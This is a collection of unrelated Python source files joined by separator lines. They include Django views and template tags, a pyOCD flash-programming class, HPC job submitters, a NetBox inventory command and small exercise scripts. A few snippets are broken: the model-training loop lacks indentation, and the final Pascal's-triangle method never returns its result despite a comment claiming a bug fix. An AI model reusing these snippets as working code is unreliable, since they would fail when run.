        clientRequest["response"]["responseText"] = "Do you need assistance with"
        clientRequest["response"]["options"] = home_options
        clientRequest["response"]["search"] = []
        return clientRequest
def get_options(searchPath):
    # Stub: search-backed options are not implemented yet; always returns "".
    return ""
|
import ast

import numpy as np


def harmonic_mean(values):
    """Return the harmonic mean of `values`, rounded to 2 decimals.

    Same computation as the original script: n / sum(1/x for x in values).
    """
    m = np.asarray(values, dtype=float)
    return round(float(m.size / np.sum(1.0 / m)), 2)


if __name__ == "__main__":
    # SECURITY: ast.literal_eval replaces eval() — it accepts the same
    # literal inputs (e.g. "[1, 2, 3]") but cannot execute arbitrary code.
    vetor = ast.literal_eval(input("Vetor da media:"))
    print(harmonic_mean(vetor))
|
import nltk
from nltk.stem.porter import PorterStemmer
from nltk.stem.lancaster import LancasterStemmer
def pos_tag(tokens):
    """Fetch the tagger model, then print part-of-speech tags for `tokens`."""
    nltk.download('averaged_perceptron_tagger')
    print(nltk.pos_tag(tokens))
def tokenize(sentence):
    """Word-tokenize `sentence`, print the tokens and return them.

    Side effect: also stores the result in the module-level global `tokens`
    (other code presumably relies on this — TODO confirm before removing).
    """
    global tokens
    nltk.download('punkt')
    tokens = nltk.word_tokenize(sentence)
    print(tokens)
    return tokens
def stem(tokens):
    """Print the Porter stem of every token in `tokens`."""
    stemmer = PorterStemmer()
    for word in tokens:
        print(stemmer.stem(word))
def stem2(tokens):
    """Print the Lancaster stem of every token in `tokens`."""
    stemmer = LancasterStemmer()
    for word in tokens:
        print(stemmer.stem(word))
# debug configuration parameters for different tasks
#
# count tf-idf values
# -l -c tfidf -output data/tfIdfResults.xml
#
# learn by tfIdf
# -l -c tfidfLearning -input data/tfIdfResults.xml
#
# classification by tf-idf
# -l -c tfidfClassification -input data/tfIdfResults.xml
|
# coding=UTF-8
from django.conf import settings
def context_processor(request):
    """Expose settings.CONTACT_LINK to every template as CONTACT_LINK."""
    return dict(CONTACT_LINK=settings.CONTACT_LINK)
|
"""
Copyright (c) 2019 Cypress Semiconductor Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import json
from cysecuretools.execute.programmer.base import ProgrammerBase, ResetType
from pyocd.core.helpers import ConnectHelper
from pyocd.core import exceptions
from pyocd.flash import loader
from pyocd.flash.loader import FlashEraser
from pyocd import coresight
from cysecuretools.execute.programmer.exceptions import ExtendedTransferFaultError
TARGET_MAP = os.path.join(os.path.dirname(__file__), 'pyocd_target_map.json')
class Pyocd(ProgrammerBase):
    """pyOCD-backed implementation of ProgrammerBase.

    Wraps a pyOCD debug session/probe/target and exposes connect, memory
    read/write, register access, flash erase and flash programming.
    """

    def __init__(self):
        super(Pyocd, self).__init__()
        # All of these are populated by connect() and stay None until then.
        self.session = None
        self.board = None
        self.target = None
        self.probe = None

    def connect(self, target_name=None, interface=None, probe_id=None):
        """
        Connects to target using default debug interface.
        :param target_name: The target name.
        :param interface: Debug interface.
        :param probe_id: Probe serial number.
        :return: True if connected successfully, otherwise False.
        """
        if interface:
            raise NotImplementedError
        else:
            if target_name:
                # Search for device in target map
                with open(TARGET_MAP) as f:
                    file_content = f.read()
                    json_data = json.loads(file_content)
                    # Map the user-facing name to the pyOCD target override.
                    for json_target in json_data:
                        if target_name.lower().strip() == json_target.lower().strip():
                            target_name = json_data[json_target]
                            break
                options = {
                    'target_override': target_name
                }
            else:
                options = {}
            # blocking=True: wait until a probe becomes available.
            self.session = ConnectHelper.session_with_chosen_probe(blocking=True, options=options, board_id=probe_id,
                                                                   unique_id=probe_id)
            if self.session is None:
                return False
            self.board = self.session.board
            self.session.open()
            self.target = self.board.target
            self.probe = self.session.probe

            # Write infinite loop into RAM and start core execution
            self.halt()
            # B662 - CPSIE I - Enable IRQ by clearing PRIMASK
            # E7FE - B - Jump to address (argument is an offset)
            self.write32(0x08000000, 0xE7FEB662)
            self.write_reg('pc', 0x08000000)
            self.write_reg('sp', 0x08001000)
            self.write_reg('xpsr', 0x01000000)
            self.resume()
            return True

    def disconnect(self):
        """
        Closes active connection.
        """
        if self.session is None:
            raise ValueError('Debug session is not initialized.')
        self.session.close()

    def set_frequency(self, value_khz):
        """
        Sets probe frequency.
        :param value_khz: Frequency in kHz.
        """
        if self.probe is None:
            raise ValueError('Debug probe is not initialized.')
        # pyOCD expects Hz.
        self.probe.set_clock(value_khz * 1000)

    def halt(self):
        """
        Halts the target.
        """
        if self.session is None:
            raise ValueError('Debug session is not initialized.')
        self.target.halt()

    def resume(self):
        """
        Resumes the execution
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        self.target.resume()

    def reset(self, reset_type=ResetType.SW):
        """
        Resets the target.
        :param reset_type: The reset type.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        self.target.reset(reset_type=reset_type)

    def reset_and_halt(self, reset_type=ResetType.SW):
        """
        Resets the target and halts the CPU immediately after reset.
        :param reset_type: The reset type.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        self.target.reset_and_halt(reset_type=reset_type)

    def read8(self, address):
        """
        Reads 8-bit value from specified memory location.
        :param address: The memory address to read.
        :return: The read value.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        try:
            data = self.target.read_memory(address, transfer_size=8)
        except exceptions.TransferFaultError as e:
            raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
        return data

    def read16(self, address):
        """
        Reads 16-bit value from specified memory location.
        :param address: The memory address to read (must be 2-byte aligned).
        :return: The read value.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        if (address & 0x01) == 0:
            try:
                data = self.target.read_memory(address, transfer_size=16)
            except exceptions.TransferFaultError as e:
                raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
            return data
        else:
            raise ValueError('Address not aligned.')

    def read32(self, address):
        """
        Reads 32-bit value from specified memory location.
        :param address: The memory address to read (must be 4-byte aligned).
        :return: The read value.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        if (address & 0x03) == 0:
            try:
                data = self.target.read_memory(address, transfer_size=32)
            except exceptions.TransferFaultError as e:
                raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
            return data
        else:
            raise ValueError('Address not aligned.')

    def write8(self, address, value):
        """
        Writes 8-bit value by specified memory location.
        :param address: The memory address to write.
        :param value: The 8-bit value to write.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        try:
            data = self.target.write_memory(address, value, transfer_size=8)
        except exceptions.TransferFaultError as e:
            raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
        return data

    def write16(self, address, value):
        """
        Writes 16-bit value by specified memory location.
        :param address: The memory address to write.
        :param value: The 16-bit value to write.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        try:
            data = self.target.write_memory(address, value, transfer_size=16)
        except exceptions.TransferFaultError as e:
            raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
        return data

    def write32(self, address, value):
        """
        Writes 32-bit value by specified memory location.
        :param address: The memory address to write.
        :param value: The 32-bit value to write.
        """
        if self.target is None:
            raise ValueError('Target is not initialized.')
        try:
            data = self.target.write_memory(address, value, transfer_size=32)
        except exceptions.TransferFaultError as e:
            raise ExtendedTransferFaultError(e.fault_address, e.fault_length)
        return data

    def read_reg(self, reg_name):
        """
        Gets value of a core register.
        :param reg_name: Core register name (case-insensitive, e.g. 'pc').
        :return: The register value.
        """
        reg = reg_name.lower()
        if reg in coresight.cortex_m.CORE_REGISTER:
            value = self.target.read_core_register(reg)
            return value
        else:
            raise ValueError(f'Unknown core register {reg}.')

    def write_reg(self, reg_name, value):
        """
        Sets value of a core register.
        :param reg_name: Core register name (case-insensitive, e.g. 'pc').
        :param value: The value to set.
        :return: The register value.
        """
        reg = reg_name.lower()
        if reg in coresight.cortex_m.CORE_REGISTER:
            self.target.write_core_register(reg, value)
        else:
            raise ValueError(f'Unknown core register {reg}.')

    def erase(self, address, size):
        """
        Erases entire device flash or specified sectors.
        :param address: The memory location.
        :param size: The memory size.
        """
        region = self.session.target.memory_map.get_region_for_address(address)
        if not region:
            raise ValueError('Address 0x%08x is not within a memory region.' % address)
        if not region.is_flash:
            raise ValueError('Address 0x%08x is not in flash.' % address)
        # Sector-granular erase over the [address, address+size) range.
        eraser = FlashEraser(self.session, FlashEraser.Mode.SECTOR)
        address_range = f"{hex(address)}-{hex(address + size)}"
        eraser.erase([address_range])

    def program(self, filename, file_format=None, address=None):
        """
        Programs a file into flash.
        :param filename: Path to a file.
        :param file_format: File format. Default is to use the file's extension.
        :param address: Base address used for the address where to flash a binary.
        :return: True if programmed successfully, otherwise False.
        """
        if self.session is None:
            raise ValueError('Debug session is not initialized.')
        programmer = loader.FileProgrammer(self.session, chip_erase='sector')
        programmer.program(filename, base_address=address, file_format=file_format)
|
# -*- coding: utf-8 -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the reproman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Submitters for `reproman run`.
"""
import abc
import collections
from functools import wraps
import json
import logging
import re
import time
from reproman.cmd import CommandError
from reproman.dochelpers import borrowdoc
lgr = logging.getLogger("reproman.support.jobs.submitters")
def assert_submission_id(method):
    """Decorate `method` to guard against unset submission ID.

    When ``self.submission_id`` is falsy, log a warning and short-circuit
    with the ("unknown", None) status tuple instead of calling `method`.
    """
    @wraps(method)
    def guarded(self, *args, **kwargs):
        if not self.submission_id:
            lgr.warning("Cannot check status without a submission ID")
            return "unknown", None
        return method(self, *args, **kwargs)
    return guarded
class Submitter(object, metaclass=abc.ABCMeta):
    """Base Submitter class.

    A submitter is responsible for submitting a command on a resource (e.g., to
    a batch system).
    """

    def __init__(self, session):
        # `session` is used to execute commands on the (possibly remote)
        # resource.
        self.session = session
        # Set by submit(); the decorated status properties depend on it.
        self.submission_id = None

    # NOTE(review): abc.abstractproperty has been deprecated since Python 3.3
    # in favor of @property + @abc.abstractmethod; kept as-is here.
    @abc.abstractproperty
    def submit_command(self):
        """A list the defines the command used to submit the job.
        """

    def submit(self, script, submit_command=None):
        """Submit `script`.

        Parameters
        ----------
        script : str
            Submission script.
        submit_command : list or None, optional
            If specified, use this instead of `.submit_command`.

        Returns
        -------
        submission ID (str) or, if one can't be determined, None.
        """
        lgr.info("Submitting %s", script)
        out, _ = self.session.execute_command(
            (submit_command or self.submit_command) + [script])
        subm_id = out.rstrip()
        if subm_id:
            self.submission_id = subm_id
        return subm_id

    @abc.abstractproperty
    def status(self):
        """Return the status of a submitted job.

        The return value is a tuple where the first item is a restricted set of
        values that the submitter uses to decide what to do. Valid values are
        'waiting', 'completed', and 'unknown'.

        The second item should be the status as reported by the batch system or
        None if one could not be determined.
        """

    def follow(self):
        """Follow submitted command, exiting once it is finished.
        """
        # Poll `status` until the job leaves the 'waiting' state.
        while True:
            our_status, their_status = self.status
            if our_status != "waiting":
                if their_status:
                    lgr.info("Final state of job %s: %s",
                             self.submission_id, their_status)
                break
            lgr.info("Waiting on job %s: %s",
                     self.submission_id, their_status)
            time.sleep(10)  # TODO: pull out/make configurable
class PbsSubmitter(Submitter):
    """Submit a PBS job.
    """
    name = "pbs"

    def __init__(self, session):
        super(PbsSubmitter, self).__init__(session)

    @property
    @borrowdoc(Submitter)
    def submit_command(self):
        return ["qsub"]

    @property
    @assert_submission_id
    @borrowdoc(Submitter)
    def status(self):
        # FIXME: One problem is that Torque PBS may not represent the array
        # consistently between versions (or perhaps configuration?). One system
        # I try has [] in the name and allows qstat querying of the commands as
        # a whole, while the other explodes them all out into individual jobs
        # with no way AFAICS to query individual jobs. Going through DRMAA
        # might help in many cases (and is probably something we should
        # provide), but it's not a complete solution because a PBS system we
        # want to support doesn't have DRMAA support.

        # FIXME: Is there a reliable, long-lived way to see a job after it's
        # completed? (tracejob can fail with permission issues.)
        try:
            stat_out, _ = self.session.execute_command(
                "qstat -f {}".format(self.submission_id))
        except CommandError:
            # qstat failed (e.g. the job has already been purged).
            return "unknown", None
        match = re.search(r"job_state = ([A-Z])", stat_out)
        if not match:
            lgr.warning("No job status match found in %s", stat_out)
            return "unknown", None
        job_state = match.group(1)
        # R/E/H/Q/W (running/exiting/held/queued/waiting) -> still pending;
        # C -> completed.
        if job_state in ["R", "E", "H", "Q", "W"]:
            our_state = "waiting"
        elif job_state == "C":
            our_state = "completed"
        else:
            our_state = "unknown"
        return our_state, job_state
class CondorSubmitter(Submitter):
    """Submit a HTCondor job.
    """
    name = "condor"

    def __init__(self, session):
        super(CondorSubmitter, self).__init__(session)
        # Prefer the JSON status query; _status falls back to the plain
        # text parser on older condor versions.
        self._status_method = self._status_json

    @property
    @borrowdoc(Submitter)
    def submit_command(self):
        return ["condor_submit", "-terse"]

    @borrowdoc(Submitter)
    def submit(self, script, submit_command=None):
        # Discard return value, which isn't submission ID for the current
        # condor_submit form.
        out = super(CondorSubmitter, self).submit(script, submit_command)
        # Output example (3 subjobs): 199.0 - 199.2
        job_id = out.strip().split(" - ")[0].split(".")[0]
        self.submission_id = job_id
        return job_id

    @property
    @assert_submission_id
    @borrowdoc(Submitter)
    def status(self):
        try:
            st = self._status_method()
        except CommandError:
            if self._status_method.__name__ == "_status_json":
                # Older condor: switch permanently to the text parser.
                lgr.debug("condor_q -json failed. Trying another method.")
                self._status_method = self._status_no_json
                st = self._status_method()
            else:
                st = "unknown", None
        return st

    def _status_json(self):
        # Query job status as JSON (condor_q -json); empty output means the
        # job is no longer known to the queue.
        stat_out, _ = self.session.execute_command(
            "condor_q -json {}".format(self.submission_id))
        if not stat_out.strip():
            lgr.debug("Status output for %s empty", self.submission_id)
            return "unknown", None
        stat_json = json.loads(stat_out)
        # http://pages.cs.wisc.edu/~adesmet/status.html
        condor_states = {0: "unexpanded",
                         1: "idle",
                         2: "running",
                         3: "removed",
                         4: "completed",
                         5: "held",
                         6: "submission error"}
        codes = [sj.get("JobStatus") for sj in stat_json]
        waiting_states = [0, 1, 2, 5]
        if any(c in waiting_states for c in codes):
            our_status = "waiting"
        elif all(c == 4 for c in codes):
            our_status = "completed"
        else:
            our_status = "unknown"
        # FIXME: their status should represent all subjobs, but right now we're
        # just taking the first code.
        return our_status, condor_states.get(codes[0])

    def _status_no_json(self):
        """Unclever status for older condor versions without 'condor_q -json'.
        """
        # Parse the trailing:
        #   0 jobs; 0 completed, 0 removed, 0 idle, 0 running, 0 held, 0 suspended
        stat_out, _ = self.session.execute_command(
            "condor_q {}".format(self.submission_id))
        last_line = stat_out.strip().splitlines()[-1]
        ours, theirs = "unknown", None
        match_njobs = re.match(r"([1-9][0-9]*) jobs;", last_line.strip())
        if match_njobs:
            njobs = int(match_njobs.group(1))
            # Try to match our json matching above. This leaves some out from
            # both lists. I don't know what the exact map is.
            to_ours = [(r"[1-9][0-9]* (idle|running|held)", "waiting"),
                       (r"[1-9][0-9]* (removed)", "unknown"),
                       # Only consider completed if we don't have a hit for
                       # anything else and its number matches the total
                       # reported number of jobs.
                       (r"{} (completed)".format(njobs), "completed")]
            for regexp, ours_ in to_ours:
                match_stat = re.search(regexp, last_line)
                if match_stat:
                    theirs = match_stat.group(1)
                    ours = ours_
                    break
        # FIXME: their status should represent all subjobs, but right now we're
        # just taking the first hit from the list above.
        return ours, theirs
class LocalSubmitter(Submitter):
    """Submit a local job.
    """
    name = "local"

    def __init__(self, session):
        super(LocalSubmitter, self).__init__(session)

    @property
    @borrowdoc(Submitter)
    def submit_command(self):
        return ["sh"]

    @borrowdoc(Submitter)
    def submit(self, script, submit_command=None):
        output = super(LocalSubmitter, self).submit(script, submit_command)
        # The submit command prints the backgrounded job's PID; empty or
        # missing output means we failed to capture one.
        pid = (output.strip() or None) if output else None
        self.submission_id = pid
        return pid

    @property
    @assert_submission_id
    @borrowdoc(Submitter)
    def status(self):
        # A live `ps` entry for the PID means the process is still running.
        try:
            output, _ = self.session.execute_command(
                ["ps", "-o", "pid=", "-p", self.submission_id])
        except CommandError:
            return "unknown", None
        return ("waiting", "running") if output.strip() else ("completed", "completed")
# Registry of the available submitter classes, keyed by their `name`
# attribute, in the order listed here.
SUBMITTERS = collections.OrderedDict(
    (o.name, o) for o in [
        PbsSubmitter,
        CondorSubmitter,
        LocalSubmitter,
    ]
)
|
import os
class RecursiveImporterUtilities(object):
    """Helper routines for recursively locating importable data files."""

    @staticmethod
    def getDirCSVFiles(directory, verbose=True):
        """Recursively collect the full paths of all ``.csv`` files under *directory*.

        Parameters
        ----------
        directory : str or path-like (may be a GUI QString; converted via str())
            Root directory to walk.
        verbose : bool
            When True, print a header, each file found, and a note when
            nothing is found.

        Returns
        -------
        list of str
            Full paths of every CSV file found, in os.walk order.
        """
        csvFileList = []
        if verbose:
            # Parenthesized single-argument print works identically on
            # Python 2 and 3.
            print("\r\nGetting CSV files\r\n-----------")
        # note: directory may be a QString -> must be converted to str
        for root, dirs, fileNames in os.walk(str(directory)):
            for fileName in fileNames:
                fileExt = os.path.splitext(fileName)[1]
                if fileExt == ".csv":
                    fullPath = os.path.join(root, fileName)
                    csvFileList.append(fullPath)
                    if verbose:
                        print("CSV File Search Found: " + fullPath)
        # BUG FIX: the original used bitwise `&` between comparisons and
        # compared against `True`/`[]`; use logical `and` with truthiness.
        if verbose and not csvFileList:
            print("CSV File Search Found: no files")
            print("\r\n")
        return csvFileList
|
# Generated by Django 2.0.1 on 2018-05-09 16:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter ``api.Task.status`` to an IntegerField with an explicit default of 0."""
    dependencies = [
        ('api', '0011_task_status'),
    ]
    operations = [
        migrations.AlterField(
            model_name='task',
            name='status',
            field=models.IntegerField(default=0),
        ),
    ]
|
from methods import get_order, train_model
# get list
overall_list, _ = get_order()
# set i to the number of mosaics -1
num = 0
i = 21
# start model training with number of repetitions
# set all parameters
for num in range(5):
print("On repetition ", num)
train_model(train_path=overall_list[i], extra_path=overall_list[24],
val_path="/home/s6nocrem/project/croptypes/csv/mosaics_validation/mosaics_validation_ssh.csv",
dataset_size=len(overall_list[i]), dataset_number=i+1, repetition=num, net="VGG", num_classes=5, batch_size=100, epochs=10, mode='other')
|
from getpass import getpass
from ncclient.transport.errors import AuthenticationError
from paramiko import AuthenticationException
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction
from dcim.models import Device, Module, Site
class Command(BaseCommand):
    help = "Update inventory information for specified devices"
    # Defaults come from settings; may be overridden via -u / -p below.
    username = settings.NETBOX_USERNAME
    password = settings.NETBOX_PASSWORD
    def add_arguments(self, parser):
        """Register the command-line options for this management command."""
        parser.add_argument('-u', '--username', dest='username', help="Specify the username to use")
        parser.add_argument('-p', '--password', action='store_true', default=False, help="Prompt for password to use")
        parser.add_argument('-s', '--site', dest='site', action='append',
                            help="Filter devices by site (include argument once per site)")
        parser.add_argument('-n', '--name', dest='name', help="Filter devices by name (regular expression)")
        parser.add_argument('--full', action='store_true', default=False, help="For inventory update for all devices")
        parser.add_argument('--fake', action='store_true', default=False, help="Do not actually update database")
    def handle(self, *args, **options):
        """Connect to each selected device, pull its inventory, and sync it to the DB."""
        def create_modules(modules, parent=None):
            # Recursively persist a module tree; `device` is the loop
            # variable of the enclosing for-loop below (closure), so this
            # helper must only be called from inside that loop.
            for module in modules:
                m = Module(device=device, parent=parent, name=module['name'], part_id=module['part_id'],
                           serial=module['serial'], discovered=True)
                m.save()
                create_modules(module.get('modules', []), parent=m)
        # Credentials
        if options['username']:
            self.username = options['username']
        if options['password']:
            self.password = getpass("Password: ")
        # Attempt to inventory only active devices
        device_list = Device.objects.filter(status=True)
        # --site: Include only devices belonging to specified site(s)
        if options['site']:
            sites = Site.objects.filter(slug__in=options['site'])
            if sites:
                site_names = [s.name for s in sites]
                self.stdout.write("Running inventory for these sites: {}".format(', '.join(site_names)))
            else:
                raise CommandError("One or more sites specified but none found.")
            device_list = device_list.filter(rack__site__in=sites)
        # --name: Filter devices by name matching a regex
        if options['name']:
            device_list = device_list.filter(name__iregex=options['name'])
        # --full: Gather inventory data for *all* devices
        if options['full']:
            self.stdout.write("WARNING: Running inventory for all devices! Prior data will be overwritten. (--full)")
        # --fake: Gathering data but not updating the database
        if options['fake']:
            self.stdout.write("WARNING: Inventory data will not be saved! (--fake)")
        device_count = device_list.count()
        self.stdout.write("** Found {} devices...".format(device_count))
        for i, device in enumerate(device_list, start=1):
            self.stdout.write("[{}/{}] {}: ".format(i, device_count, device.name), ending='')
            # Skip inactive devices
            if not device.status:
                self.stdout.write("Skipped (inactive)")
                continue
            # Skip devices without primary_ip set
            if not device.primary_ip:
                self.stdout.write("Skipped (no primary IP set)")
                continue
            # Skip devices which have already been inventoried if not doing a full update
            if device.serial and not options['full']:
                self.stdout.write("Skipped (Serial: {})".format(device.serial))
                continue
            # Platform-specific RPC client class; None when the platform is
            # unsupported.
            RPC = device.get_rpc_client()
            if not RPC:
                self.stdout.write("Skipped (no RPC client available for platform {})".format(device.platform))
                continue
            # Connect to device and retrieve inventory info
            try:
                with RPC(device, self.username, self.password) as rpc_client:
                    inventory = rpc_client.get_inventory()
            except KeyboardInterrupt:
                # Let Ctrl-C abort the whole run rather than skipping one device.
                raise
            except (AuthenticationError, AuthenticationException):
                self.stdout.write("Authentication error!")
                continue
            except Exception as e:
                self.stdout.write("Error: {}".format(e))
                continue
            if options['verbosity'] > 1:
                # Verbose: dump the full inventory tree we received.
                self.stdout.write("")
                self.stdout.write("\tSerial: {}".format(inventory['chassis']['serial']))
                self.stdout.write("\tDescription: {}".format(inventory['chassis']['description']))
                for module in inventory['modules']:
                    self.stdout.write("\tModule: {} / {} ({})".format(module['name'], module['part_id'],
                                                                     module['serial']))
            else:
                self.stdout.write("{} ({})".format(inventory['chassis']['description'], inventory['chassis']['serial']))
            if not options['fake']:
                with transaction.atomic():
                    # Update device serial
                    if device.serial != inventory['chassis']['serial']:
                        device.serial = inventory['chassis']['serial']
                        device.save()
                    # Replace any previously discovered modules with the
                    # freshly retrieved tree.
                    Module.objects.filter(device=device, discovered=True).delete()
                    create_modules(inventory.get('modules', []))
        self.stdout.write("Finished!")
|
from django import template
from ticker_app.models import ExchangeTicker
from tradeBOT.models import CoinMarketCupCoin, UserMainCoinPriority, Pair, ExchangeMainCoin, UserPair
from trade.models import UserBalance
register = template.Library()
@register.filter(name='user_have_coin')
def user_holdings(coin_symbol, user_exchange):
    """Return the user's total balance of *coin_symbol* on the exchange (0 if none)."""
    try:
        balance = UserBalance.objects.get(ue_id=user_exchange, coin=coin_symbol)
    except UserBalance.DoesNotExist:
        return 0
    return balance.total
@register.filter(name='get_coinmarket_id')
def get_coinmarket_id(symbol):
    """Return the CoinMarketCap id of the best-ranked coin with *symbol* ('' if unknown)."""
    try:
        best_ranked = CoinMarketCupCoin.objects.filter(symbol=symbol).earliest('rank')
    except CoinMarketCupCoin.DoesNotExist:
        return ''
    return best_ranked.coin_market_id
@register.inclusion_tag('tradeBOT/user_primary.html')
def get_user_primary_coins(user_exchange, primary_coin):
    """Render the user's priority record for *primary_coin* on *user_exchange*."""
    try:
        priority = UserMainCoinPriority.objects.get(user_exchange=user_exchange, main_coin=primary_coin)
    except UserMainCoinPriority.DoesNotExist:
        return {'success': False}
    return {'coin': priority, 'success': True}
@register.inclusion_tag('tradeBOT/get_primary_pairs.html')
def get_primary_pairs(coin, user_exchange):
    """Render the pairs for *coin* whose second coin ranks in the top 100.

    The previous try/except was dead code: ``QuerySet.filter`` never raises
    ``DoesNotExist`` -- it simply returns an empty queryset -- so the
    ``return None`` branch was unreachable.
    """
    pairs = Pair.objects.filter(main_coin=coin, second_coin__rank__lte=100).order_by('is_active',
                                                                                    'second_coin__symbol')
    return {'pairs': pairs, 'user_exchange': user_exchange}
@register.filter(name='get_last')
def get_last(pair, user_exchange):
    """Return the newest ticker 'last' price for *pair*, rounded to 8 places (0 if missing)."""
    latest = ExchangeTicker.objects.filter(exchange_id=user_exchange.exchange.pk,
                                           pair_id=pair.pk).order_by('-id').first()
    # BUG FIX: .first() returns None when no ticker row exists yet; the old
    # code crashed with AttributeError on `.pk`.  Also avoids the redundant
    # second query that re-fetched the same row by pk.
    if latest is None or latest.last is None:
        return 0
    return round(latest.last, 8)
@register.filter(name='get_change_percent')
def get_change_percent(pair, user_exchange):
    """Return the newest ticker change for *pair* as a percentage (0 if missing)."""
    latest = ExchangeTicker.objects.filter(exchange_id=user_exchange.exchange.pk,
                                           pair_id=pair.pk).order_by('-id').first()
    # BUG FIX: .first() returns None when no ticker row exists yet; the old
    # code crashed with AttributeError on `.pk`.  Also avoids the redundant
    # second query that re-fetched the same row by pk.
    if latest is None or latest.percent_change is None:
        return 0
    return round(latest.percent_change * 100, 2)
@register.filter(name='is_pair_active')
def is_pair_active(user_pair, user_exchange_pk):
    """Whether the pair's main coin is active for this user.

    False when the coin is not an exchange main coin at all; True when the
    user has no explicit priority row (default-active).
    """
    try:
        exchange_coin = ExchangeMainCoin.objects.get(coin=user_pair.pair.main_coin)
    except ExchangeMainCoin.DoesNotExist:
        return False
    try:
        priority = UserMainCoinPriority.objects.get(user_exchange_id=user_exchange_pk,
                                                    main_coin=exchange_coin)
    except UserMainCoinPriority.DoesNotExist:
        return True
    return priority.is_active
@register.filter(name='user_pair_rate_of_change')
def user_pair_rate_of_change(user_pair_pk):
    """Rate-of-change setting of the given UserPair pk (0.0 when the row is gone)."""
    try:
        return UserPair.objects.get(pk=user_pair_pk).rate_of_change
    except UserPair.DoesNotExist:
        return float(0)
@register.filter(name='user_pair_interval_change')
def user_pair_interval_change(user_pair_pk):
    """Change-interval setting of the given UserPair pk (0 when the row is gone)."""
    try:
        return UserPair.objects.get(pk=user_pair_pk).change_interval
    except UserPair.DoesNotExist:
        return 0
@register.filter(name='multiple')
def multiple(value, factor):
    """Template filter: return *value* multiplied by *factor*."""
    product = value * factor
    return product
@register.filter(name='haven_percent')
def haven_percent(coin, ue):
    """Percentage of the exchange account's total BTC value held in *coin*."""
    try:
        coin_total_btc = UserBalance.objects.get(ue=ue, coin=coin.symbol.lower()).btc_value
    except UserBalance.DoesNotExist:
        coin_total_btc = 0
    # BUG FIX: a zero (or empty) account total previously raised
    # ZeroDivisionError; report 0% instead.
    if not ue.total_btc:
        return 0
    return coin_total_btc / (ue.total_btc / 100)
|
"""NickJuliaOnlineJournal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from core import views
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', views.homeredirect, name="homeredirect"),
    path('<typeDeleted>/', views.home, name="home"),
    path('aboutus', views.splash, name="splash"),
    path('journalstats', views.journal_stats, name="journalstats"),
    path('piecharts', views.piecharts, name="piecharts"),
    path('favorite/<theEntry>/<whichT>/', views.favorite, name='favorite'),
    path('pin/<theEntry>/<whichT>/', views.pin, name='pin'),
    path('delete/<theEntry>/<whichT>/', views.delete, name='delete'),
    path('login', views.login_, name="login"),
    # BUG FIX: the signup route was also named "login", so reverse('login')
    # resolved to the signup URL.  Give it its own name.
    path('signup', views.signup, name="signup"),
    path('logout', views.logout_, name="logout"),
]
|
# 4.10.10.py
# This program displays information about a triangle drawn by the user.
# import libraries
from graphics import *
from math import sqrt
def main():
    """Let the user click three triangle vertices, draw it, and show its area.

    Uses Heron's formula on the three side lengths.  The original wrapped
    the body in a pointless ``for i in range(1)`` loop, shadowed the
    ``quit`` builtin, and bound the drawn Polygon to an unused variable.
    """
    win = GraphWin("Triangle Information", 400, 400)
    # Three clicks define the triangle's vertices.
    p1 = win.getMouse()
    p2 = win.getMouse()
    p3 = win.getMouse()
    # Side lengths from the pairwise vertex distances.
    a = sqrt((p1.getX() - p2.getX()) ** 2 + (p1.getY() - p2.getY()) ** 2)
    b = sqrt((p2.getX() - p3.getX()) ** 2 + (p2.getY() - p3.getY()) ** 2)
    c = sqrt((p3.getX() - p1.getX()) ** 2 + (p3.getY() - p1.getY()) ** 2)
    # Heron's formula: area from the semi-perimeter s.
    s = (a + b + c) / 2
    area = sqrt(s * (s - a) * (s - b) * (s - c))
    # Draw the triangle itself.
    Polygon(Point(p1.getX(), p1.getY()), Point(p2.getX(), p2.getY()),
            Point(p3.getX(), p3.getY())).draw(win)
    # Textual information.
    Text(Point(200, 50), f"Area of the Triangle is {area}").draw(win)
    # Quitting prompt.
    quit_prompt = Text(Point(200, 10), "Click again to quit")
    quit_prompt.setStyle("bold")
    quit_prompt.draw(win)
    win.getMouse()
    win.close()

main()
|
#!/usr/bin/env python3
__author__ = 'Wei Mu'
class Solution:
    def getRow(self, rowIndex: int) -> list:
        """Return row *rowIndex* (0-based) of Pascal's triangle.

        Builds each row from the previous one in O(rowIndex^2) time and
        O(rowIndex) extra space.

        BUG FIX: the original annotated the return as ``List[int]`` without
        importing ``typing.List``, which raises NameError the moment the
        class body is executed; the plain ``list`` builtin needs no import.
        """
        row = [1]
        for size in range(1, rowIndex + 1):
            nxt = [1] * (size + 1)
            # Interior entries are sums of adjacent entries in the row above.
            for k in range(1, size):
                nxt[k] = row[k - 1] + row[k]
            row = nxt
